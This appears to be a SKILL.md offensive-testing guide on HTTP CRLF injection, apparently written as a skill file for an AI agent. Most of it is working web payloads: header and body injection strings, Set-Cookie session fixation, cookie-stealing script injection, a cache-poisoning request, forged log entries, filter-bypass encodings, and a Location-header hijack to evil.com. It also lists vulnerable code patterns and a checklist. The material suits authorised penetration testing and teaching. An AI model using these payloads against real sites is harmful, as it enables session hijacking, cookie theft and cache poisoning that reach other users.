SKILL.md
$27
2. DETECTION
Basic Probe
%0D%0ANew-Header:injected
# In URL parameter:
https://target.com/redirect?url=%0D%0AX-Injected:true
# Check response headers for "X-Injected: true"Double CRLF — Body Injection
Two consecutive CRLF sequences end headers and start body:
%0D%0A%0D%0A<script>alert(1)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(1)</script>3. EXPLOITATION SCENARIOS
Session Fixation via Set-Cookie
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_idXSS via Response Body
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>Cache Poisoning
If the response is cached by a CDN or proxy, injected headers/body are served to all users:
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>Log Injection
CRLF in log-visible fields (User-Agent, Referer) can forge log entries:
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 2004. FILTER BYPASS
Filter
Bypass
Blocks %0D%0A
Try %0D alone, %0A alone, or %E5%98%8A%E5%98%8D (Unicode)
URL decodes once
Double-encode: %250D%250A
Strips \r\n literally
Use URL-encoded form
Blocks in value only
Inject in parameter name
# Unicode/UTF-8 bypass:
%E5%98%8A%E5%98%8D → decoded as CRLF in some parsers
# Double URL encoding:
%250D%250A → server decodes to %0D%0A → interpreted as CRLF
# Partial injection (LF only):
%0A → some servers accept LF without CR5. REAL-WORLD EXPLOITATION CHAINS
CRLF + Session Fixation
# Inject Set-Cookie via CRLF in redirect parameter:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# Result:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id
# Victim uses attacker's session → attacker hijacks after loginCRLF → XSS via Double CRLF Body Injection
# Two CRLF sequences end headers and inject response body:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>
# Result:
HTTP/1.1 302 Found
Location: /page
<script>alert(document.cookie)</script>CRLF in 302 Location → Redirect Hijack
# Inject new Location header before the original:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A
# Some servers use the LAST Location header → redirect to evil.com6. COMMON VULNERABLE PATTERNS
// PHP — header() with user input (PHP < 5.1.2 vulnerable):
header("Location: " . $_GET['url']);
// Python — redirect with unsanitized input:
return redirect(request.args.get('next'))
// Node.js — setHeader with user input:
res.setHeader('X-Custom', userInput);
// Java — response.setHeader with user input:
response.setHeader("Location", request.getParameter("url"));7. TESTING CHECKLIST
□ Inject %0D%0A in redirect URL parameters
□ Inject %0D%0A in Set-Cookie name/value paths
□ Try double CRLF for body injection → XSS
□ Test encoding bypasses: double-encode, Unicode (%E5%98%8D%E5%98%8A), LF-only (%0A)
□ Check if response is cacheable → cache poisoning
□ Test in User-Agent / Referer for log injection
□ Test CRLF + Set-Cookie for session fixation
□ Verify if Location header can be injected in 302 responses